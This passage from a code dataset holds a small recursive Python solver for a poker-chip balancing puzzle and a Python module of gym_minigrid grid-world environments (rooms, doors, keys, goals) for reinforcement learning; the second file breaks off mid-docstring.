+{"seq_id":"119699365","text":"def pokerChips2(chips):\n memory = {}\n total = len(chips)\n return count_poker_moves(chips, 0, sum(chips) / len(chips), total, memory)\n\ndef count_poker_moves(chips, moves, average, total, memory):\n str_value = ''\n max_value = max(chips)\n position = chips.index(max_value)\n new_chips = chips[position:position+1] + chips[position+1:] + chips[:position]\n\n for value in map(lambda x: str(x), new_chips):\n str_value += value + ','\n\n if str_value in memory:\n return memory[str_value]\n\n if max_value == average or moves == total:\n return moves\n\n new_array = new_chips[1:]\n new_array2 = new_array[:]\n new_array[0] += max_value - average\n new_array2[len(new_array2)-1] += max_value - average\n count1 = count_poker_moves(new_array, moves, average, total, memory)\n count2 = count_poker_moves(new_array2, moves, average, total, memory)\n\n if count1 < count2:\n total_moves = moves + count1 + 1\n else:\n total_moves = moves + count2 + 1\n memory[str_value] = total_moves\n return total_moves\n\nprint(pokerChips2([18, 22, 30, 21, 2, 20, 22, 8, 30, 30, 7, 23, 1, 22, 8, 23, 7, 22, 25, 26, 17, 30, 27, 6, 25, 29, 20, 9, 3, 25, 16, 16, 30, 30, 8, 15, 27, 25, 6, 22, 16, 10, 24, 14, 26, 0, 13, 28, 11, 5]))\n","sub_path":"old/poker_chips2b.py","file_name":"poker_chips2b.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"526592022","text":"import sys, itertools, operator, inspect\nimport numpy as np\nimport gym\n\nfrom gym_minigrid.minigrid import Grid, MiniGridEnv\nfrom gym_minigrid.roomgrid import RoomGrid\nimport gym_minigrid.entities as entities\nfrom gym_minigrid.entities import Goal, Wall, Door, Key, Ball, Box, Lava, COLORS, OBJECTS\n\n\nclass Empty(MiniGridEnv):\n \"\"\"\n This environment is an empty room, and the goal of the agent is to reach the green goal square, which provides a sparse reward. A small penalty is subtracted for the number of steps to reach the goal. This environment is useful, with small rooms, to validate that your RL algorithm works correctly, and with large rooms to experiment with sparse rewards and exploration. The random variants of the environment have the agent starting at a random position for each episode, while the regular variants have the agent always starting in the corner opposite to the goal.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n agent_start_pos=(1,1),\n agent_start_state='right',\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place the agent\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n\n self.mission = 'get to the green goal square'\n\n\nclass FourRooms(MiniGridEnv):\n \"\"\"\n Classic four room reinforcement learning environment. The agent must navigate in a maze composed of four rooms interconnected by 4 gaps in the walls. To obtain a reward, the agent must reach the green goal square. 
Both the agent and the goal square are randomly placed in any of the four rooms.\n \"\"\"\n\n def __init__(self, agent_pos=None, goal_pos=None, max_steps=None, **kwargs):\n self._agent_default_pos = agent_pos\n self._goal_default_pos = goal_pos\n super().__init__(\n height=19, \n width=19, \n max_steps=100 if max_steps is None else max_steps, \n **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n room_w = width // 2\n room_h = height // 2\n\n # For each row of rooms\n for i in range(0, 2):\n\n # For each column\n for j in range(0, 2):\n i_top = i * room_h\n j_left = j * room_w\n i_bottom = i_top + room_h\n j_right = j_left + room_w\n\n # Right wall and door\n if j + 1 < 2:\n self.vert_wall(i_top, j_right, room_h)\n pos = (self.rng.randint(i_top + 1, i_bottom), j_right)\n self[pos].clear()\n\n # Bottom wall and door\n if i + 1 < 2:\n self.horz_wall(i_bottom, j_left, room_w)\n pos = (i_bottom, self.rng.randint(j_left + 1, j_right))\n self[pos].clear()\n\n # Randomize the player start position and orientation\n if self._agent_default_pos is not None:\n self.agent.pos = self._agent_default_pos\n self.agent.state = self.rng.choice(self.agent.STATES) # assuming random start direction\n else:\n self.place_agent()\n\n if self._goal_default_pos is not None:\n self[self._goal_default_pos] = Goal()\n else:\n self.place_obj(Goal())\n\n self.mission = 'Reach the goal'\n\n\nclass DoorKey(MiniGridEnv):\n \"\"\"\n This environment has a key that the agent must pick up in order to unlock a door and then get to the green goal square. Because of the sparse reward, this environment is difficult to solve using classical RL algorithms. It is useful to experiment with curiosity or curriculum learning.\n \"\"\"\n\n def __init__(self, size=8, max_steps=None, **kwargs):\n super().__init__(\n height=size,\n width=size,\n max_steps=10 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Create a vertical splitting wall\n split_idx = self.rng.randint(2, width - 2)\n self.vert_wall(0, split_idx)\n\n # Place the agent at a random position and orientation\n # on the left side of the splitting wall\n self.place_agent(size=(height, split_idx))\n\n # Place a door in the wall\n door_idx = self.rng.randint(1, height - 2)\n self[door_idx, split_idx] = Door('yellow', state='locked')\n\n # Place a yellow key on the left side\n self.place_obj(Key('yellow'), top=(0, 0), size=(height, split_idx))\n\n self.mission = 'use the key to open the door and then get to the goal'\n\n\nclass _MultiRoom(object):\n\n def __init__(self,\n top,\n size,\n entry_door_pos,\n exit_door_pos\n ):\n self.top = top\n self.size = size\n self.entry_door_pos = entry_door_pos\n self.exit_door_pos = exit_door_pos\n\n\nclass MultiRoom(MiniGridEnv):\n \"\"\"\n This environment has a series of connected rooms with doors that must be opened in order to get to the next room. The final room has the green goal square the agent must get to. This environment is extremely difficult to solve using RL alone. 
However, by gradually increasing the number of rooms and building a curriculum, the environment can be solved.\n \"\"\"\n\n def __init__(self,\n min_num_rooms=6,\n max_num_rooms=6,\n max_room_size=10,\n max_steps=None,\n **kwargs\n ):\n assert min_num_rooms > 0\n assert max_num_rooms >= min_num_rooms\n assert max_room_size >= 4\n\n self.min_num_rooms = min_num_rooms\n self.max_num_rooms = max_num_rooms\n self.max_room_size = max_room_size\n\n self.rooms = []\n\n super().__init__(\n height=25,\n width=25,\n max_steps=self.max_num_rooms * 20 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n room_list = []\n\n # Choose a random number of rooms to generate\n num_rooms = self.rng.randint(self.min_num_rooms, self.max_num_rooms + 1)\n\n while len(room_list) < num_rooms:\n cur_room_list = []\n\n entry_door_pos = (\n self.rng.randint(0, height - 2),\n self.rng.randint(0, width - 2)\n )\n\n # Recursively place the rooms\n self._place_room(\n num_rooms,\n room_list=cur_room_list,\n min_sz=4,\n max_sz=self.max_room_size,\n entry_door_wall=2,\n entry_door_pos=entry_door_pos\n )\n\n if len(cur_room_list) > len(room_list):\n room_list = cur_room_list\n\n # Store the list of rooms in this environment\n assert len(room_list) > 0\n self.rooms = room_list\n\n # Create the grid\n self.grid = Grid(height, width)\n\n prev_door_color = None\n\n # For each room\n for idx, room in enumerate(room_list):\n\n top_i, top_j = room.top\n room_height, room_width = room.size\n\n # Generate the surrounding walls\n self.horz_wall(top_i, top_j, width=room_width)\n self.horz_wall(top_i + room_height - 1, top_j, width=room_width)\n self.vert_wall(top_i, top_j, height=room_height)\n self.vert_wall(top_i, top_j + room_width - 1, height=room_height)\n\n # If this isn't the first room, place the entry door\n if idx > 0:\n # Pick a door color different from the previous one\n door_colors = set(COLORS)\n if prev_door_color:\n door_colors.remove(prev_door_color)\n # Note: the use of sorting here guarantees determinism,\n # This is needed because Python's set is not deterministic\n door_colors = self.rng.choice(sorted(door_colors))\n\n self[room.entry_door_pos] = Door(door_colors)\n prev_door_color = door_colors\n\n prev_room = room_list[idx - 1]\n prev_room.exit_door_pos = room.entry_door_pos\n\n # Randomize the starting agent position and direction\n self.place_agent(room_list[0].top, room_list[0].size)\n\n # Place the final goal in the last room\n self.goal_pos = self.place_obj(Goal(), room_list[-1].top, room_list[-1].size)\n\n self.mission = 'traverse the rooms to get to the goal'\n\n def _place_room(\n self,\n num_left,\n room_list,\n min_sz,\n max_sz,\n entry_door_wall,\n entry_door_pos\n ):\n # Choose the room size randomly\n size_i = self.rng.randint(min_sz, max_sz + 1)\n size_j = self.rng.randint(min_sz, max_sz + 1)\n\n # The first room will be at the door position\n if len(room_list) == 0:\n top_i, top_j = entry_door_pos\n # Entry on the right\n elif entry_door_wall == 0:\n i = entry_door_pos[0]\n top_i = self.rng.randint(i - size_i + 2, i)\n top_j = entry_door_pos[1] - size_j + 1\n # Entry wall on the bottom\n elif entry_door_wall == 1:\n top_i = entry_door_pos[0] - size_i + 1\n j = entry_door_pos[1]\n top_j = self.rng.randint(j - size_j + 2, j)\n # Entry wall on the left\n elif entry_door_wall == 2:\n i = entry_door_pos[0]\n top_i = self.rng.randint(i - size_i + 2, i)\n top_j = entry_door_pos[1]\n # Entry wall on the top\n elif entry_door_wall == 3:\n top_i = entry_door_pos[0]\n 
j = entry_door_pos[1]\n top_j = self.rng.randint(j - size_j + 2, j)\n else:\n raise ValueError(f'Entry door wall index wrong: {entry_door_wall}')\n\n # If the room is out of the grid, can't place a room here\n if top_i < 0 or top_j < 0:\n return False\n if top_i + size_i >= self.height or top_j + size_j > self.width:\n return False\n\n # If the room intersects with previous rooms, can't place it here\n for room in room_list[:-1]:\n non_overlap = \\\n top_i + size_i < room.top[0] or \\\n room.top[0] + room.size[0] <= top_i or \\\n top_j + size_j < room.top[1] or \\\n room.top[1] + room.size[1] <= top_j\n\n if not non_overlap:\n return False\n\n # Add this room to the list\n room_list.append(_MultiRoom(\n (top_i, top_j),\n (size_i, size_j),\n entry_door_pos,\n None\n ))\n\n # If this was the last room, stop\n if num_left == 1:\n return True\n\n # Try placing the next room\n for i in range(0, 8):\n\n # Pick which wall to place the out door on\n wall_set = set((0, 1, 2, 3))\n wall_set.remove(entry_door_wall)\n exit_door_wall = self.rng.choice(sorted(wall_set))\n next_entry_wall = (exit_door_wall + 2) % 4\n\n # Pick the exit door position\n # Exit on right wall\n if exit_door_wall == 0:\n exit_door_pos = (\n top_i + self.rng.randint(1, size_i - 1),\n top_j + size_j - 1\n )\n # Exit on bottom wall\n elif exit_door_wall == 1:\n exit_door_pos = (\n top_i + size_i - 1,\n top_j + self.rng.randint(1, size_j - 1)\n )\n # Exit on left wall\n elif exit_door_wall == 2:\n exit_door_pos = (\n top_i + self.rng.randint(1, size_i - 1),\n top_j\n )\n # Exit on top wall\n elif exit_door_wall == 3:\n exit_door_pos = (\n top_i,\n top_j + self.rng.randint(1, size_j - 1)\n )\n else:\n raise ValueError\n\n # Recursively create the other rooms\n success = self._place_room(\n num_left - 1,\n room_list=room_list,\n min_sz=min_sz,\n max_sz=max_sz,\n entry_door_wall=next_entry_wall,\n entry_door_pos=exit_door_pos\n )\n\n if success:\n break\n\n return True\n\n\nclass Fetch(MiniGridEnv):\n \"\"\"\n This environment has multiple objects of assorted types and colors. The agent receives a textual string as part of its observation telling it which object to pick up. 
Picking up the wrong object produces a negative reward.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n num_objs=3,\n max_steps=None,\n **kwargs\n ):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n types = ['key', 'ball']\n\n objs = []\n\n # For each object to be generated\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n\n self.place_obj(obj)\n objs.append(obj)\n\n # Randomize the player start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n target = objs[self.rng.randint(0, len(objs))]\n self.target_type = target.type\n self.target_color = target.color\n\n # Generate the mission string\n missions = ['get a', 'go get a', 'fetch a', 'go fetch a', 'you must fetch a']\n self.mission = self.rng.choice(missions) + f' {self.target_color} {self.target_type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.agent.is_carrying:\n if self.agent.carrying.color == self.target_color and \\\n self.agent.carrying.type == self.target_type:\n reward = self._win_reward\n else:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass GoToObject(MiniGridEnv):\n \"\"\"\n This environment is a room containing a few objects of assorted types and colors. The agent receives a textual (mission) string as input, telling it which object to go to, (eg: \"go to the red ball\"). It receives a positive reward for performing the `done` action next to the correct object, as indicated in the mission string.\n \"\"\"\n\n def __init__(self, size=6, num_objs=2, max_steps=None, **kwargs):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Types and colors of objects we can generate\n types = ['key', 'ball', 'box']\n\n objs = []\n # Until we have generated all the objects\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n # If this object already exists, try again (objs holds entity\n # instances, so compare on (type, color) pairs)\n if (obj_type, obj_color) in [(o.type, o.color) for o in objs]:\n continue\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n\n self.place_obj(obj)\n objs.append(obj)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n self.target = self.rng.choice(objs)\n\n self.mission = f'go to the {self.target.color} {self.target.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n # The toggle action terminates the episode\n if self.actions[action] == 'toggle':\n reward = self._lose_reward\n done = True\n\n # Reward performing the done action next to the target object\n ai, aj = self.agent.pos\n ti, tj = self.target.pos\n if self.actions[action] == 'done':\n reward = self._lose_reward\n if abs(ai - ti) <= 1 and abs(aj - tj) <= 1:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass GoToDoor(MiniGridEnv):\n \"\"\"\n This environment is a room with four doors, one on each wall. The agent receives a textual (mission) string as input, telling it which door to go to, (eg: \"go to the red door\"). 
It receives a positive reward for performing the `done` action next to the correct door, as indicated in the mission string.\n \"\"\"\n\n def __init__(self, size=5, max_steps=None, **kwargs):\n assert size >= 5\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Randomly vary the room width and height\n height = self.rng.randint(5, height + 1)\n width = self.rng.randint(5, width + 1)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Generate the 4 doors at random positions\n door_pos = [(0, self.rng.randint(2, width - 2)),\n (height - 1, self.rng.randint(2, width - 2)),\n (self.rng.randint(2, height - 2), 0),\n (self.rng.randint(2, height - 2), width - 1)]\n\n # Generate the door colors\n door_colors = self.rng.choice(COLORS, size=len(door_pos), replace=False)\n\n # Place the doors in the grid\n for idx, pos in enumerate(door_pos):\n color = door_colors[idx]\n self[pos] = Door(color)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Select a random target door\n door_idx = self.rng.randint(0, len(door_pos))\n self.target_pos = door_pos[door_idx]\n self.target_color = door_colors[door_idx]\n\n # Generate the mission string\n self.mission = f'go to the {self.target_color} door'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n ai, aj = self.agent.pos\n ti, tj = self.target_pos\n\n # Don't let the agent open any of the doors\n if self.actions[action] == 'toggle':\n reward = self._lose_reward\n done = True\n\n # Reward performing done action in front of the target door\n if self.actions[action] == 'done':\n reward = self._lose_reward\n if (ai == ti and abs(aj - tj) == 1) or (aj == tj and abs(ai - ti) == 1):\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass PutNear(MiniGridEnv):\n \"\"\"\n The agent is instructed through a textual string to pick up an object and place it next to another object. 
This environment is easy to solve with two objects, but difficult to solve with more, as it involves both textual understanding and spatial reasoning involving multiple objects.\n \"\"\"\n\n def __init__(\n self,\n size=6,\n num_objs=2,\n max_steps=None,\n **kwargs\n ):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Types and colors of objects we can generate\n types = ['key', 'ball', 'box']\n\n objs = []\n obj_pos = []\n\n def near_obj(env, p1):\n for p2 in obj_pos:\n di = p1[0] - p2[0]\n dj = p1[1] - p2[1]\n if abs(di) <= 1 and abs(dj) <= 1:\n return True\n return False\n\n # Until we have generated all the objects\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n # If this object already exists, try again\n if (obj_type, obj_color) in objs:\n continue\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n\n self.place_obj(obj, reject_fn=near_obj)\n\n objs.append((obj_type, obj_color))\n obj_pos.append(obj.pos)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be moved\n obj_idx = self.rng.randint(0, len(objs))\n self.move_type, self.move_color = objs[obj_idx]\n # self.move_pos = obj_pos[obj_idx]\n\n # Choose a target object (to put the first object next to)\n while True:\n targetIdx = self.rng.randint(0, len(objs))\n if targetIdx != obj_idx:\n break\n self.target_type, self.target_color = objs[targetIdx]\n self.target_pos = obj_pos[targetIdx]\n\n self.mission = (f'put the {self.move_color} {self.move_type} near '\n f'the {self.target_color} {self.target_type}')\n\n def step(self, action):\n pre_carrying = self.agent.carrying\n\n obs, reward, done, info = super().step(action)\n\n oi, oj = self.agent.front_pos\n ti, tj = self.target_pos\n\n # If we picked up the wrong object, terminate the episode\n if self.actions[action] == 'pickup' and self.agent.is_carrying:\n if self.agent.carrying.type != self.move_type or self.agent.carrying.color != self.move_color:\n reward = self._lose_reward\n done = True\n\n # If successfully dropping an object near the target\n if self.actions[action] == 'drop' and pre_carrying:\n reward = self._lose_reward\n # the grid is indexed (row, col), matching front_pos\n if self[oi, oj] is pre_carrying:\n if abs(oi - ti) <= 1 and abs(oj - tj) <= 1:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass RedBlueDoor(MiniGridEnv):\n \"\"\"\n The purpose of this environment is to test memory. The agent is randomly placed within a room with one red and one blue door facing opposite directions. The agent has to open the red door and then open the blue door, in that order. The agent, when facing one door, cannot see the door behind him. 
Hence, the agent needs to remember whether or not he has previously opened the other door in order to reliably succeed at completing the task.\n \"\"\"\n\n def __init__(self, size=8, max_steps=None, **kwargs):\n self.size = size\n\n super().__init__(\n height=size,\n width=2 * size,\n max_steps=20 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the grid walls\n self.wall_rect(0, 0, self.size, 2 * self.size)\n self.wall_rect(0, self.size // 2, self.size, self.size)\n\n # Place the agent in the top-left corner\n self.place_agent(top=(0, self.size // 2), size=(self.size, self.size))\n\n # Add a red door at a random position in the left wall\n pos = self.rng.randint(1, self.size - 1)\n self.red_door = Door('red')\n self[pos, self.size // 2] = self.red_door\n\n # Add a blue door at a random position in the right wall\n pos = self.rng.randint(1, self.size - 1)\n self.blue_door = Door('blue')\n self[pos, self.size // 2 + self.size - 1] = self.blue_door\n\n # Generate the mission string\n self.mission = 'open the red door then the blue door'\n\n def step(self, action):\n red_door_opened_before = self.red_door.is_open\n blue_door_opened_before = self.blue_door.is_open\n\n obs, reward, done, info = super().step(action)\n\n red_door_opened_after = self.red_door.is_open\n blue_door_opened_after = self.blue_door.is_open\n\n if blue_door_opened_after:\n if red_door_opened_before:\n reward = self._win_reward\n done = True\n else:\n reward = self._lose_reward\n done = True\n\n elif red_door_opened_after:\n if blue_door_opened_before:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass Memory(MiniGridEnv):\n \"\"\"\n This environment is a memory test. The agent starts in a small room\n where it sees an object. It then has to go through a narrow hallway\n which ends in a split. At each end of the split there is an object,\n one of which is the same as the object in the starting room. 
The\n agent has to remember the initial object, and go to the matching\n object at split.\n \"\"\"\n\n def __init__(\n self,\n size=13,\n random_length=False,\n max_steps=None,\n **kwargs\n ):\n self.random_length = random_length\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n assert height % 2 == 1\n upper_room_wall = height // 2 - 2\n lower_room_wall = height // 2 + 2\n if self.random_length:\n hallway_end = self.rng.randint(4, width - 2)\n else:\n hallway_end = width - 3\n\n # Start room\n self.horz_wall(upper_room_wall, 1, width=4)\n self.horz_wall(upper_room_wall + 1, 4, width=1)\n self.horz_wall(lower_room_wall, 1, width=4)\n self.horz_wall(lower_room_wall - 1, 4, width=1)\n\n # Horizontal hallway\n self.horz_wall(upper_room_wall + 1, 5, width=hallway_end - 5)\n self.horz_wall(lower_room_wall - 1, 5, width=hallway_end - 5)\n\n # Vertical hallway\n self.vert_wall(0, hallway_end, height=height)\n self.vert_wall(0, hallway_end + 2, height=height)\n self[height // 2, hallway_end].clear()\n\n # Fix the player's start position and orientation\n self.agent.pos = (height // 2,\n self.rng.randint(1, hallway_end + 1))\n self.agent.state = 'right'\n\n # Place objects\n start_room_obj = self.rng.choice([Key, Ball])\n self[height // 2 - 1, 1] = start_room_obj('green')\n\n other_objs = self.rng.permutation([Ball, Key])\n pos0 = (height // 2 - 2, hallway_end + 1)\n pos1 = (height // 2 + 2, hallway_end + 1)\n self[pos0] = other_objs[0]('green')\n self[pos1] = other_objs[1]('green')\n\n # Choose the target objects\n if start_room_obj == other_objs[0]:\n self.success_pos = (pos0[0], pos0[1] + 1)\n self.failure_pos = (pos1[0], pos1[1] - 1)\n else:\n self.success_pos = (pos1[0], pos1[1] - 1)\n self.failure_pos = (pos0[0], pos0[1] + 1)\n\n self.mission = 'go to the matching object at the end of the hallway'\n\n def step(self, action):\n if self.actions[action] == 'pickup':\n action = self.actions.index('toggle')\n obs, reward, done, info = super().step(action)\n\n if tuple(self.agent.pos) == self.success_pos:\n reward = self._win_reward\n done = True\n if tuple(self.agent.pos) == self.failure_pos:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass _LockedRoom(object):\n\n def __init__(self,\n top,\n size,\n door_pos\n ):\n self.top = top\n self.size = size\n self.door_pos = door_pos\n self.color = None\n self.locked = False\n\n def rand_pos(self, env):\n top_i, top_j = self.top\n size_i, size_j = self.size\n return (env.rng.randint(top_i + 1, top_i + size_i - 1),\n env.rng.randint(top_j + 1, top_j + size_j - 1))\n\n\nclass LockedRoom(MiniGridEnv):\n \"\"\"\n The environment has six rooms, one of which is locked. The agent receives a textual mission string as input, telling it which room to go to in order to get the key that opens the locked room. It then has to go into the locked room in order to reach the final goal. 
This environment is extremely difficult to solve with vanilla reinforcement learning alone.\n \"\"\"\n\n def __init__(self, size=19, max_steps=None, **kwargs):\n super().__init__(\n height=size, \n width=size, \n max_steps=10 * size if max_steps is None else max_steps, \n **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Hallway walls\n\n left_wall = width // 2 - 2\n right_wall = width // 2 + 2\n\n self.vert_wall(0, left_wall, height=height)\n self.vert_wall(0, right_wall, height=height)\n\n self.rooms = []\n\n # Room splitting walls\n for n in range(0, 3):\n i = n * (height // 3)\n self.horz_wall(i, 0, width=left_wall)\n self.horz_wall(i, right_wall, width=width - right_wall)\n\n room_height = height // 3 + 1\n room_width = left_wall + 1\n self.rooms.append(_LockedRoom(\n (i, 0),\n (room_height, room_width),\n (i + 3, left_wall)\n ))\n self.rooms.append(_LockedRoom(\n (i, right_wall),\n (room_height, room_width),\n (i + 3, right_wall)\n ))\n\n # Choose one random room to be locked\n locked_room = self.rng.choice(self.rooms)\n locked_room.locked = True\n goal_i = self.rng.randint(locked_room.top[0] + 1, locked_room.top[0] + locked_room.size[0] - 1)\n goal_j = self.rng.randint(locked_room.top[1] + 1, locked_room.top[1] + locked_room.size[1] - 1)\n self[goal_i, goal_j] = Goal()\n\n # Assign the door colors\n colors = self.rng.choice(COLORS, size=len(self.rooms))\n for room, color in zip(self.rooms, colors):\n room.color = color\n if room.locked:\n self[room.door_pos] = Door(color, state='locked')\n else:\n self[room.door_pos] = Door(color)\n\n # Select a random room to contain the key\n while True:\n key_room = self.rng.choice(self.rooms)\n if key_room != locked_room:\n break\n key_pos = key_room.rand_pos(self)\n self[key_pos] = Key(locked_room.color)\n\n # Randomize the player start position and orientation\n self.place_agent(\n top=(0, left_wall),\n size=(height, right_wall - left_wall)\n )\n\n # Generate the mission string\n self.mission = (\n f'get the {locked_room.color} key from the {key_room.color} room, '\n f'unlock the {locked_room.color} door and go to the goal'\n )\n\n\nclass KeyCorridor(RoomGrid):\n \"\"\"\n A ball is behind a locked door, the key is placed in a\n random room.\n\n This environment is similar to the locked room environment, but there are multiple registered environment configurations of increasing size, making it easier to use curriculum learning to train an agent to solve it. The agent has to pick up an object which is behind a locked door. The key is hidden in another room, and the agent has to explore the environment to find it. 
The mission string does not give the agent any clues as to where the key is placed.\n \"\"\"\n _requires_language = False\n\n def __init__(\n self,\n num_rows=3,\n obj_type='ball',\n room_size=6,\n max_steps=None,\n **kwargs\n ):\n self.obj_type = obj_type\n\n super().__init__(\n room_size=room_size,\n num_rows=num_rows,\n max_steps=30 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Connect the middle column rooms into a hallway\n for i in range(1, self.num_rows):\n self.remove_wall(i, 1, 'up')\n\n # Add a locked door on the top left\n # Add an object behind the locked door\n room_idx = self.rng.randint(self.num_rows)\n door = self.add_door(room_idx, 2, door_idx='left', locked=True)\n self.obj = self.add_object(room_idx, 2, kind=self.obj_type)\n\n # Add a key in a random room on the left side\n self.add_object(self.rng.randint(self.num_rows), 0, 'key', door.color)\n\n # Place the agent in the middle\n self.place_agent(i=self.num_rows // 2, j=1)\n\n # Make sure all rooms are accessible\n self.connect_all()\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass Unlock(RoomGrid):\n \"\"\"\n The agent has to open a locked door.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=8 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Make sure the two rooms are directly connected by a locked door\n self.door = self.add_door(0, 0, door_idx='right', locked=True)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', self.door.color)\n\n self.place_agent(i=0, j=0)\n\n self.mission = 'open the door'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'toggle':\n if self.door.is_open:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass UnlockPickup(RoomGrid):\n \"\"\"\n The agent has to pick up a box which is placed in another room, behind a locked door.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=8 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Add a box to the room on the right\n self.obj = self.add_object(0, 1, kind='box')\n # Make sure the two rooms are directly connected by a locked door\n door = self.add_door(0, 0, door_idx='right', locked=True)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', door.color)\n\n self.place_agent(i=0, j=0)\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass BlockedUnlockPickup(RoomGrid):\n \"\"\"\n The agent has to pick up a 
